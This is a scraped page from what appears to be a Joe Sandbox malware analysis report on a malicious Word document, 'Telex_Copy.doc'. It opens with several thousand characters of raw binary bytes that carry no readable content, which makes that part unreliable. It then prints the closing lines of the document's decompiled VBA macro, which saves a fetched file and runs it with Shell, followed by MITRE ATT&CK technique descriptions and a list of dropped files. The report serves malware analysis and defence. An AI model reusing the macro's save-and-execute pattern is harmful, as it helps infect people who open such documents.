?&??(??\x00??\x00????\x00????\x00????\x00?\x19???\x00??\x00?r?????\x00????\x04????\x00?}??\x00 ??\x00\xfffd?)??n???\x00??\x00 ?+??n???\x00\x00\x00\x01\x00T\x00t\x00\x05\x00\x08A?\x05\xfffd\x00\x0b???\x00?(??\x00?u??\x00??\x17?\x06??????\x00???\x08??\x00?(??\x00??????????J?\x08??\x00?(??\x08?y???\x19??\x00????????\x00??\x14???\x00\x06?\x00?\x01\x0f\x00\x0c??U???\x00??\x02+\x00\x01?`??\x1b????????\x00?\x15?\x00^?\x00 ?\x04?\x00\x00\x00??\x00?\x1c??=??\x00??\x00?\x1e??=??\x00??\x00? ??=??\x00??\x00?"??>??\x00??\x00?$??>??\x00??\x00?&??>??\x00??\x00?(?????\x00??\x00??????\x00??\x00?,?????\x00??\x00?????\x00 ?\x1c??B???\x00???C??\x00 ?\x1c??\x00?E???\x00???F??\x00 ?\x1c??H???\x00????\x00 ?\x1d??B???\x00 ?\x00??\x00?D???\x00????\x00 ?\x1d????\x00?G???\x00??\x00 ?\x1d?? ?\x19???\x00??\x00 ?\x1e??\x01??C??\x00 ?\x1e?? ?E???\x00???F??\x00 ?\x1e??H???\x00????\x00 ?\x1f??B???\x00 ?\x00??\x00?D???\x00????\x00 ?\x1f????\x00?G???\x00??\x00 ?\x1f?? ?\x19???\x00??\x00 ? ??\x02??C??\x00 ? ?? ?E???\x00???F??\x00 ? ??H???\x00????\x00 ?!??B???\x00???C??\x00 ?!?? ?E???\x00???F??\x00 ?!??H???\x00????\x00 ?"????\x00?D???\x00????\x00 ?"??I???\x00???F??\x00 ?"??H???\x00????\x00 ?#??\x00??C??\x00 ?#?? ?E???\x00??\x00 ?#????\x00?G???\x00??\x00 ?$??\x00?f???\x00 ?\x00??\x00?D???\x00????\x00 ?$??\x01??F??\x00 ?$??H???\x00????\x00 ?%??\x00??C??\x00 ?%?? ?E???\x00 g\x00??\x00?G???\x00??H???\x00????\x00 ?&??\x02??C??\x00 ?&?? ?E???\x00???F??\x00 ?&???\x00 ?'????\x00?D???\x00????\x00 ?'??I???\x00???F??\x00 ?'???\x00 ?(??\xfffd???\x00??\x00 ?(??\xfffd???\x00???C??\x00 ?(?? ?E???\x00??\x00 ?(??\x02 U\x00?\x00?G???\x00??H???\x00??\x18??\x00?????\x00 \xfffd\x00@\x00 \xfffd\x00?\x00?f???\x00??i\x00?\x00?D???\x00????\x00 ?)????\x00?G???\x00??H???\x00????\x00 ?)??J???\x00??\x15??\x00?L???\x00 \xfffd\x00?\x00 \xfffd\x00?\x00?f???\x00??i\x00?\x00?D???\x00????\x00 ?????\x00?G???\x00??H???\x00????\x00 ???J???\x00??\x16??\x00?L???\x00 \xfffd\x00@\x00 \xfffd\x00?\x00?f???\x00 ?\x00?\x01?C??\x00 ?+?? ?E???\x00???F??\x00 ?+???\x00 ?+??\x0b?\x19???\x00??\x00 ?+???\x00?K??\x00 ?,??\x00?f???\x00 '\x00?\x01?C??\x00 ?,??\x0b?E???\x00???F??\x00 ?,???\x00 ?,??\x0b?\x19???\x00??\x00 ?,???\x00?K??\x00 ?-??\x02??C??\x00 ?-??\x01?E??? executed
48	lS8slOu6.savetofile N, 2	savetofile
49	Shell (N)	Shell("TelexCopy.png") -> 172 executed
50	End Sub

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
Tactics:	Command and Control
Data Sources:	Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Telex_Copy.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\TelexCopy[1].png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{B42B132F-BBD5-498C-8DAF-6207449BFE1E}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C7CAC9BC-1140-4E43-A415-F39DE2B8E989}.tmp

C:\Users\user\AppData\Local\Temp\~DF27C1B5AE15FF2044.TMP

C:\Users\user\AppData\Local\Temp\~DFD5CA9A1D41FFC491.TMP

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Telex_Copy.LNK

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

C:\Users\user\Desktop\~$lex_Copy.doc

C:\Windows\System32\TelexCopy.png

Static File Info

General

File Icon

Static OLE Info

General

OLE File "Telex_Copy.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 3940

General

Windows Analysis Report
Telex_Copy.doc

Subroutine
Document_OpenAPIs: 11, Strings: 13, Number of lines: 39, Relevance: 74.039